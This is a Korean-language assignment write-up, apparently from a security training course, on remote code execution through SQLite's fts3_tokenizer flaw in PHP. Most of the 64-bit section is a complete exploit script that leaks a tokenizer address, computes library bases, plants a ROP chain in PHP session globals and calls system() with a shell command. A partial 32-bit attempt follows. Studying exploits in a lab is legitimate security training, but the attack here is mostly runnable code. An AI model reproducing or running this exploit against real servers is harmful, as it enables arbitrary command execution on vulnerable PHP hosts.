[과제 정리] Remote Code Execution

과제2 64bit Remote Code Execution

---

멘토님이 주신 64bit exploit code에서 가젯을 바꾸어 시도해보았다.

fts3_tokenizer 취약점을 이용한 것으로 새로운 tokenizer를 등록할 때, 두 가지 취약점을 이용하였다. 첫 번째로 등록된 tokenizer의 주소를 쿼리하면 주소가 유출된다는 점과

<?php

$db = new SQLite3(":memory:");
$row = $db->query("select hex(fts3_tokenizer('simple')) addr;")->fetchArray();
$leaked_addr = $row['addr'];

?>

두 번째로, 인자를 2개 이상 전달했을 때, 두 번째 인자값을 원하는 주소로 넣어버릴 때 적절한 검증없이 주소가 바뀌어버린다는 점을 이용하였다.

<?php

$db->exec(" 
    select fts3_tokenizer('simple', x'$bomb'); 
    create virtual table a using fts3(tokenize=simple);"
);

?>

가젯에 조작가능한 스트링을 넣을 주소와 8바이트 데이터를 여러 개 사용하기 위해 php에 내장되어 있는 글로벌 변수 php_gs_globals structure 를 이용하였다.

64bit system에서 8바이트 데이터로 long 과 char * 인 변수를 사용하였다.

[ 주소 찾기 ]

그 다음 사용할 라이브러리의 베이스 주소와 변수들의 주소를 실습과 같이 진행하여 구하였다.

shell cat /proc/self/maps | grep "libphp"

[ 가젯 찾기 ]

ROPgadget을 설치한 후

python3 [ROPgadget.py](<http://ROPgadget.py>) -binary [바이너리파일명] | grep "leave ; ret"

등으로 원하는 가젯을 구하였다.

[ 오프셋 찾기 ]

leave; ret; 으로 내가 원하는 함수를 사용하고, rdx에 command string 주소, 그 다음 call r12를 통해 r12에 system 함수를 실행하도록 하였다.

• leave; ret; // stack pivoting
• pop rbx; ret // command string 주소 (libsqlite)
• pop r12; ret // system function 주소 (libsqlite)
• mov rdi, [rbx+0x18]; call r12 // call system (libsqlite)

<?php
ob_end_flush();
flush();
ob_flush();
ob_start();
echo getmypid();
echo str_repeat(" ",0x1212);
ob_end_flush();
flush();
ob_flush();
ob_start();

function flip($val) {
  $len = strlen($val);
  $result = '';
  for ($i = $len; $i > 2; $i-=2) {
    $result .= substr($val, $i - 2, 2);
  }
  $result .= substr($val, 0, $i);
  $result .= str_repeat('0', 16 - $len);  
  return $result;
}

function pk($in, $pad_to_bits=64, $little_endian=true) {
    $in = decbin($in);
    $in = str_pad($in, $pad_to_bits, '0', STR_PAD_LEFT);
    $out = '';
    for ($i = 0, $len = strlen($in); $i < $len; $i += 8) {
        $out .= chr(bindec(substr($in,$i,8)));
    }
    if($little_endian) $out = strrev($out);
    return $out;
}

################## sqlite leak 취약점으로 주소 구하기 ################
$db = new SQLite3(":memory:");
$row = $db->query("select hex(fts3_tokenizer('simple')) addr;")->fetchArray();
$leaked_addr = $row['addr'];
$db->close();

//sleep(10);

################## /proc/self/maps 읽어서 offset 구하기 ################
//:::7f016a473260:::
$addr = hexdec(flip($leaked_addr));
$libsqlite3_base = $addr - 0x28B260;
$libphp_base = $libsqlite3_base + 0xD490000;
$libc_base = $libphp_base + 0xBAB000;
$init = $addr - 0x2830a8;
$system = $libc_base + 0x3A36D0;  // (gdb) p system

//php global변수 이용
$gc_probability = $libphp_base + 0x59ABF0;
$entropy_length = $gc_probability - (8 * 10);
$cookie_path = $entropy_length + (8 * 2);
################################################################

ob_end_flush();
flush();
ob_flush();
ob_start();

echo "\\n:::".dechex($addr).":::\\n";
echo ":::libsqlite3_base ".dechex($libsqlite3_base).":::\\n";
echo ":::libphp_base ".dechex($libphp_base).":::\\n";
echo ":::init ".dechex($init).":::\\n";
echo ":::libc_base ".dechex($libc_base).":::\\n";

echo ":::gc_probability ".dechex($gc_probability).":::\\n";
echo ":::entropy_length ".dechex($entropy_length).":::\\n";
echo ":::system ".dechex($system).":::\\n";
echo str_repeat(" ",0x1212);

ob_end_flush();
flush();
ob_flush();
ob_start();

$lr = $libsqlite3_base+0x8b75; 

$payload="";
$payload .= pk(0xdeaddeaddeaddead);

$payload .= pk($libsqlite3_base+0x8eca); //pop rbx; ret
$payload .= pk($cookie_path-0x18);
$payload .= pk($libsqlite3_base+0x9cb5); //pop r12; ret
$payload .= pk($system);
$payload .= pk($libsqlite3_base+0x23b5d); //mov rdi, [rbx+0x18]; call r12

ini_set("session.cache_limiter", $payload); //payload 넣을 공간
ini_set("session.entropy_length", $lr);  //공격 시작 구간
ini_set("session.cookie_path", "ps auxf > /tmp/ch3rry_64"); //string 넣을 공간 

$db = new SQLite3(":memory:");
$bomb = flip(dechex($entropy_length-8)); 
$db->exec(" 
    select fts3_tokenizer('simple', x'$bomb'); 
    create virtual table a using fts3(tokenize=simple);"
);
?>

[ 공격 결과 ]

ch3rry_64 파일에 ps auxf 명령을 수행한 결과를 확인할 수 있다.

과제3 32bit Remote Code Execution

---

처음 접근을 시도할 때, php global 변수중에 내가 이용할 수 있는 값과,

sqlite3_tokenizer_module 에 있는 xCreate, xDestroy, xOpen등을 적절히 이용해서 익스를 해보면 어떨까? 고민해보았다.

우선, module을 global 변수를 이용해서 재정의하고, xOpen 함수를 이용하여 아래와 같이 내가 원하는 command string을 이용하고자 하였지만 익스 코드까지는 구현하지 못했다..

typedef struct _php_ps_globals {
		'''
    char *cache_limiter;    // 페이로드 공간
    long entropy_length;    // 공격 시작 , 8바이트
    long cookie_lifetime;   // X , 8바이트
    char *cookie_path;      // string 넣을 공간, 8바이트
    char *cookie_domain; // 8바이트
    zend_bool  cookie_secure; //1바이트
    zend_bool  cookie_httponly; //1바이트
    ps_module *mod; // 1바이트
    ps_module *default_mod; //1바이트
    void *mod_data;
		'''
}

$db = new SQLite3(":memory:");

$bomb=flip(dechex($entropy_length+28));
$db->exec("
    select fts3_tokenizer('simple',x'$bomb');
    create virtual table a using fts3(tokenize=simple);
    insert into a values('ps auxf > /tmp/ch3rry_32')
 ");